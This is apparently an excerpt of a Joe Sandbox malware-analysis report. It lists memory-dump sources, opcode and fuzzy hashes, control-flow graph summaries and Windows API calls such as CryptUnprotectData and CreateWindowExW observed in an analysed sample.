                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: p1q
                                                                                                              • API String ID: 0-2041350651
                                                                                                              • Opcode ID: 066c3f421827c5e30932fd45eb9f8664b115669e1da8149672bc22f6d630d0f0
                                                                                                              • Instruction ID: f1d0f069dc30797ae1e88ef345518c13dd336b0be8b97db0a1387eac05a3c0d5
                                                                                                              • Opcode Fuzzy Hash: 066c3f421827c5e30932fd45eb9f8664b115669e1da8149672bc22f6d630d0f0
                                                                                                              • Instruction Fuzzy Hash: 0072B374A01218CFEB25DF64D994BA9B7B2FB89301F5081E9D80A77760DB319E82CF54

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1434 34cad240-34cad24f 1436 34cad1e2-34cad1e5 1434->1436 1437 34cad252-34cad257 1434->1437 1438 34cad21e-34cad234 1436->1438 1439 34cad1e7-34cad1f3 1436->1439 1442 34cad9e0-34cada52 CryptUnprotectData 1437->1442 1439->1442 1443 34cada5b-34cada83 1442->1443 1444 34cada54-34cada5a 1442->1444 1444->1443
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 34CADA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: b4f928e4155b0765b61e1144d5b903e42c8045d8bb96bac9a175f094e5860be8
                                                                                                              • Instruction ID: fc4f0b0e1f51faf0adb83e4b6943b881ae1b7a0f1bb63506cc9a630ddca5b6e7
                                                                                                              • Opcode Fuzzy Hash: b4f928e4155b0765b61e1144d5b903e42c8045d8bb96bac9a175f094e5860be8
                                                                                                              • Instruction Fuzzy Hash: FC31F276804389DFEB11CF99C444BEEBFB5EF49324F14805AE554A7252C3349980CBA6

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1457 34cad1ec-34cada52 CryptUnprotectData 1459 34cada5b-34cada83 1457->1459 1460 34cada54-34cada5a 1457->1460 1460->1459
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 34CADA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: e118d55772674b7e31dd248c67d8bfcd4b218a2f08090db5532af199d9df90f3
                                                                                                              • Instruction ID: 3c0890b833f88e70db495b68403524db4c94a1f9428e2fd694d5c970c9415919
                                                                                                              • Opcode Fuzzy Hash: e118d55772674b7e31dd248c67d8bfcd4b218a2f08090db5532af199d9df90f3
                                                                                                              • Instruction Fuzzy Hash: 211114B68003499FDB10CF9AC845BEEBBF5EB48320F148419E918A7251C779A950DFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1463 34cad9d9-34cada52 CryptUnprotectData 1464 34cada5b-34cada83 1463->1464 1465 34cada54-34cada5a 1463->1465 1465->1464
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 34CADA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 06293e59dc3db7069ceb6168a5d8e48ba332407575c21523ccdfe8bf11328bb8
                                                                                                              • Instruction ID: 10648e783ba1cc9784cda967052bf8de30a90da24cb9623908c5605e1aea6c25
                                                                                                              • Opcode Fuzzy Hash: 06293e59dc3db7069ceb6168a5d8e48ba332407575c21523ccdfe8bf11328bb8
                                                                                                              • Instruction Fuzzy Hash: B21137B6800249DFDB10CF99C540BDEBBF2EB48320F148429EA54A7251C379A950DFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9dac6a819284bcf5e24460a284752b305588029314cff10cde9914141739684d
                                                                                                              • Instruction ID: becfadea2bfea254dbdf918c4f884e6e98bed1be5c359c48afbc2bbcecf2aadc
                                                                                                              • Opcode Fuzzy Hash: 9dac6a819284bcf5e24460a284752b305588029314cff10cde9914141739684d
                                                                                                              • Instruction Fuzzy Hash: 0CA27070A04209DFCB15CF68C994AAEBBB2FF88301F158559E815EF261D734ED89CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54a4ddaf6964ce6ab76dd4ab42e23a8e9c3e2c4a5752cb6526417ca29f6958c8
                                                                                                              • Instruction ID: b24d63d73c6b412831d73a1f6efa657edc213e63e774530f45b5b62146aa6449
                                                                                                              • Opcode Fuzzy Hash: 54a4ddaf6964ce6ab76dd4ab42e23a8e9c3e2c4a5752cb6526417ca29f6958c8
                                                                                                              • Instruction Fuzzy Hash: EF72BF74E052288FEB64DF69C984BDDBBB2BB49300F5081E9D859A7351DB34AE81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77a5358a661a0b9b283869620bce97e3296ba7b7edebdb5cbaf789ce917572a8
                                                                                                              • Instruction ID: d36b74b549ef405cf9468c4ce72a780a07b423c5d6b3d2cf54bff196dd771a4b
                                                                                                              • Opcode Fuzzy Hash: 77a5358a661a0b9b283869620bce97e3296ba7b7edebdb5cbaf789ce917572a8
                                                                                                              • Instruction Fuzzy Hash: D6127071A00619CFDB14DF65C854BAEBBB6FF88301F148529E815EB391DB349D85CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 11d77f48cf11e8b3ffc201caa494f899023c506ee8ba6625995100b2cd473cb3
                                                                                                              • Instruction ID: baf3fe61b641a65b32b8ce01b0623520f63660b799b0b309a088b93dba1cb309
                                                                                                              • Opcode Fuzzy Hash: 11d77f48cf11e8b3ffc201caa494f899023c506ee8ba6625995100b2cd473cb3
                                                                                                              • Instruction Fuzzy Hash: 96124130A00219DFCB54CF69C994AADBBF2FF88315F958059E825EB261DB31DD85CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 04fec5bec201367cc5bacd5e313354004029cf88aef7103be5980a0ddd0841e9
                                                                                                              • Instruction ID: 352f5bb91a256de4e0acc7900418a4574536c2cc93cc1339fc99f79e87708eb2
                                                                                                              • Opcode Fuzzy Hash: 04fec5bec201367cc5bacd5e313354004029cf88aef7103be5980a0ddd0841e9
                                                                                                              • Instruction Fuzzy Hash: 8FE1C274E01218CFEB24CFA9C994B9DBBB2BF89300F1081A9D419B7291DB755E86CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9a788c693849ea0f6f348ab58686412a606d59d0026f582d8cb7ecc201b293e
                                                                                                              • Instruction ID: 4247f97047177dcc4d064155ace87d4e7323bb1577639c6731cf2296fa0c16a9
                                                                                                              • Opcode Fuzzy Hash: a9a788c693849ea0f6f348ab58686412a606d59d0026f582d8cb7ecc201b293e
                                                                                                              • Instruction Fuzzy Hash: 67C19F74E00218CFEB54DFA9C994B9DBBB2BF89300F5081A9D819BB355DB355A86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f3dc84172a6052a13b30453437af24c8482e3b3c63709cc8c62104119557bc57
                                                                                                              • Instruction ID: ea1b7e6895332da3e2b56a3d2094f39b4e8fdc93059ffe473bf1d3b1d4c0a65b
                                                                                                              • Opcode Fuzzy Hash: f3dc84172a6052a13b30453437af24c8482e3b3c63709cc8c62104119557bc57
                                                                                                              • Instruction Fuzzy Hash: F7C18E74E00218CFEB54DFA9C994B9DBBB2BF88304F1080A9D809BB355DB355A82CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bc10ec58815a2a4d7549d28943a912d111b27b6f564849c179a1dd0fc860eb9c
                                                                                                              • Instruction ID: 3018b5f573afc10e011cf083ea14e7ac7e0f8a7a0c77d82b3d9f3afe72daabc0
                                                                                                              • Opcode Fuzzy Hash: bc10ec58815a2a4d7549d28943a912d111b27b6f564849c179a1dd0fc860eb9c
                                                                                                              • Instruction Fuzzy Hash: CFA1F374E002098FEB10DFA9C944BDDBBB2FF89304F208269E419BB291DB759985CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9e2d3c93828314fe42032dca84ffeb9696eb8eaa40d0812ad55e7dbb30952cc
                                                                                                              • Instruction ID: 04ba8e634791ef1a36235d30da2d4769ad0ceb1713cb8f2c6aba7584d51d7d7b
                                                                                                              • Opcode Fuzzy Hash: b9e2d3c93828314fe42032dca84ffeb9696eb8eaa40d0812ad55e7dbb30952cc
                                                                                                              • Instruction Fuzzy Hash: F3A10374D00209CFEB10DFA9C884B9DBBB2FF89314F208269E418BB2A1DB745985CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f555d74545f7edb627f89159b4e090e3ae6f2ed6374e34662c2ee46e9c1384c
                                                                                                              • Instruction ID: 11acd23e09091e2a73129b5b37fa2b0e512a3578382fae10a58c0ad8ebb9d1dc
                                                                                                              • Opcode Fuzzy Hash: 0f555d74545f7edb627f89159b4e090e3ae6f2ed6374e34662c2ee46e9c1384c
                                                                                                              • Instruction Fuzzy Hash: F5A192B5E05218DFEB18CF6AC944B9DBBF2AF89300F14C1AAD808B7251DB745A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e28a0c0014ba5c2358035ed1bb251a245f9ea0a54b10779d05f387f53206d9ec
                                                                                                              • Instruction ID: 2f7d959305bb79ed8c7e5bfdaf50709ba67849e3a4ac19494a24f9b351f98f6a
                                                                                                              • Opcode Fuzzy Hash: e28a0c0014ba5c2358035ed1bb251a245f9ea0a54b10779d05f387f53206d9ec
                                                                                                              • Instruction Fuzzy Hash: 07A192B5E01218DFEB18CF6AC984B9DBBF2AB89300F14C1AAD408A7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2a27607303ee5cded4fde25569fe166d0c5c3bcbed967aad4e4775c603a20df
                                                                                                              • Instruction ID: 9a9a39ec47040d4b8ab30215d587e27961d682038d67201b69f05666ec046329
                                                                                                              • Opcode Fuzzy Hash: d2a27607303ee5cded4fde25569fe166d0c5c3bcbed967aad4e4775c603a20df
                                                                                                              • Instruction Fuzzy Hash: 80A180B5E052289FEB54CF6AC944B9DFBF2BB89300F14C1AAD808B7251DB745A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e91be2edfecc1cf6b853c767a3ff0b38d8aa814bcd8ea3a9339ac3e26d134238
                                                                                                              • Instruction ID: 2a6b6782605c3fb039b932f76a10b18807003b343820b784e9ae10d010f4f352
                                                                                                              • Opcode Fuzzy Hash: e91be2edfecc1cf6b853c767a3ff0b38d8aa814bcd8ea3a9339ac3e26d134238
                                                                                                              • Instruction Fuzzy Hash: 56A193B5E012189FEB54CF6AC984B9DBBF2BF89300F14C1AAD808B7251DB745A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edab22d41f3dc39191b14a83acff1c19ffd8cf47e1a49eb12dae85dda5a7969e
                                                                                                              • Instruction ID: 5b8f7fbd3e760a85a3f0f8f2038158ce8b1a4196bb4bdf0a484daa3c842ce3aa
                                                                                                              • Opcode Fuzzy Hash: edab22d41f3dc39191b14a83acff1c19ffd8cf47e1a49eb12dae85dda5a7969e
                                                                                                              • Instruction Fuzzy Hash: 0791E074A00219CFEB10DFA9C888B9DBBB1FF49310F208259E419BB291DB759985CF15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 662689fed433c346564b94543ba981275c13031a882415366f9fe4b9e2d6bb5f
                                                                                                              • Instruction ID: ad839fe22e7cde6f9529c6ff0bd32dec9ce650b2585991af65671e60ff3057d8
                                                                                                              • Opcode Fuzzy Hash: 662689fed433c346564b94543ba981275c13031a882415366f9fe4b9e2d6bb5f
                                                                                                              • Instruction Fuzzy Hash: 6B91B574E00218DFEB14DFA9D884B9DBBF2BF89305F148069D819AB365DB349985CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f33fc0f329ce6d30bef022bc8d450037f5c42820bbf99b7d87f200ba659f8f5
                                                                                                              • Instruction ID: c303dfc0616ac0067caec7c4b863fac3f026000302b354660c3e723f0b7369c0
                                                                                                              • Opcode Fuzzy Hash: 6f33fc0f329ce6d30bef022bc8d450037f5c42820bbf99b7d87f200ba659f8f5
                                                                                                              • Instruction Fuzzy Hash: 5B81D474E00209DFEB14DFAAD95069EBBF2BF88310F248129D824BB399DB355942CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4de05de018ceb9973edc60ae12c3c7c747b3c83db3fe6fc004b752f6304eb45
                                                                                                              • Instruction ID: ad53daccabbef00a5d55f6cbb2435a120fb09628c55c21f9ccd3e6ed2f63e7a0
                                                                                                              • Opcode Fuzzy Hash: e4de05de018ceb9973edc60ae12c3c7c747b3c83db3fe6fc004b752f6304eb45
                                                                                                              • Instruction Fuzzy Hash: C17193B5E01618CFEB58CF66C944B99BBF2AF89300F14C1AAD80CA7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cf56fc0e549dd6f3dbff7675a7adc88ab6e21b2f5867173682b1a4807a1c3a7
                                                                                                              • Instruction ID: 36c4770e263a4081e23fd614a77736069b7905c348d985dd5f69c5d0e1601b48
                                                                                                              • Opcode Fuzzy Hash: 8cf56fc0e549dd6f3dbff7675a7adc88ab6e21b2f5867173682b1a4807a1c3a7
                                                                                                              • Instruction Fuzzy Hash: 2E71A3B5E016189FEB58CF6AC944B9EBBF2AF89300F14C1AAD40CA7254DB345A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8df5a0adb2dd020cff81bb603cc51bb76b64d294992553290bd345f87ad41acb
                                                                                                              • Instruction ID: 31cb9540794755dc33828b2685840944959a42de9673570b3229566983c7473a
                                                                                                              • Opcode Fuzzy Hash: 8df5a0adb2dd020cff81bb603cc51bb76b64d294992553290bd345f87ad41acb
                                                                                                              • Instruction Fuzzy Hash: F471C275E01228CFDB64CF6AC9847DDBBB2BF89301F1090AAD819B7250DB345A86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 44117dbbd985fea079a4af52a04ebdb7d9570aad8185595c17636205d8dddbc6
                                                                                                              • Instruction ID: 4dfceaf141a658d24833bb401db25be49a683e9ab3a6f70b48e43dfa94af24c1
                                                                                                              • Opcode Fuzzy Hash: 44117dbbd985fea079a4af52a04ebdb7d9570aad8185595c17636205d8dddbc6
                                                                                                              • Instruction Fuzzy Hash: 8D610734A00258CFEF25DF64D894BADB7B2FB88700F1084AA990A777A4CB755D82DF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cc53b53c3feb745cdfb163c53f64c591e2b14c6c3ed69a8f613b01f91d2752ce
                                                                                                              • Instruction ID: ce50824d4bdd3f1386239cfe66d05a4bb984f13a7bb65b4484a4cd81b7fbcbc2
                                                                                                              • Opcode Fuzzy Hash: cc53b53c3feb745cdfb163c53f64c591e2b14c6c3ed69a8f613b01f91d2752ce
                                                                                                              • Instruction Fuzzy Hash: E94179B1E016189BEB58CF6BCD447DAFAF3AFC9300F04C1AAC54CA6254DB740A868F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b30098a69d2c94c92deecc875798fa8c82d9be813dcdd4243eed9696ded89e9a
                                                                                                              • Instruction ID: 917f16cfc4795f03745901e1dcf9c3422714fce57444c60423855468c5d9a063
                                                                                                              • Opcode Fuzzy Hash: b30098a69d2c94c92deecc875798fa8c82d9be813dcdd4243eed9696ded89e9a
                                                                                                              • Instruction Fuzzy Hash: 134159B1E016189BEB58CF6BCD457C9FAF3AFC9300F04C1AAD50CA6264DB740A868F51

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37FB09FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 37FB0A3B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37FB0A78
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 37FB0AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2572038939.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37fb0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 711ca4d0ef426242c87918de5e719f18a0e1225ba4c81b41e6ba9891b59f61e3
                                                                                                              • Instruction ID: 2e4096bf24a78bb90cf0bf99b94c0295a18e24907d6f9c12ad0995420bc8ede9
                                                                                                              • Opcode Fuzzy Hash: 711ca4d0ef426242c87918de5e719f18a0e1225ba4c81b41e6ba9891b59f61e3
                                                                                                              • Instruction Fuzzy Hash: A35145B09012499FDB54CFAAC548B9EBBF0FB48310F248859D019B7261D7749981CF66

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37FB09FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 37FB0A3B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37FB0A78
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 37FB0AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2572038939.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37fb0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 8333493aaa88f582472b292cd70ca2960b270fad756368b20a450ffbbdfee92a
                                                                                                              • Instruction ID: c1d7e4a2f3a44f992dcac2bbb29309325a2108b862e9ca708d71ef01560f10af
                                                                                                              • Opcode Fuzzy Hash: 8333493aaa88f582472b292cd70ca2960b270fad756368b20a450ffbbdfee92a
                                                                                                              • Instruction Fuzzy Hash: 755145B09002098FDB14CFAAC548B9EBBF5FB48310F24C859E419B7361D774A981CF66

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1392 37fb0104-37fb0176 1393 37fb0178-37fb017e 1392->1393 1394 37fb0181-37fb0188 1392->1394 1393->1394 1395 37fb018a-37fb0190 1394->1395 1396 37fb0193-37fb0232 CreateWindowExW 1394->1396 1395->1396 1398 37fb023b-37fb0273 1396->1398 1399 37fb0234-37fb023a 1396->1399 1403 37fb0280 1398->1403 1404 37fb0275-37fb0278 1398->1404 1399->1398 1405 37fb0281 1403->1405 1404->1403 1405->1405
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FB0222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2572038939.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37fb0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: d69cb1b8ef5966cda3f566f98d5d4fce34938ee3216ee53f38a1b84e654213e6
                                                                                                              • Instruction ID: 1ef4ad3cb0aaab6f351ebfa87fc45426b96dad521c471368e3668596824def4b
                                                                                                              • Opcode Fuzzy Hash: d69cb1b8ef5966cda3f566f98d5d4fce34938ee3216ee53f38a1b84e654213e6
                                                                                                              • Instruction Fuzzy Hash: 0951C0B5D00348AFDF14CF9AC884ADEBBB1FF49310F64852AE819AB251D771A845CF91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
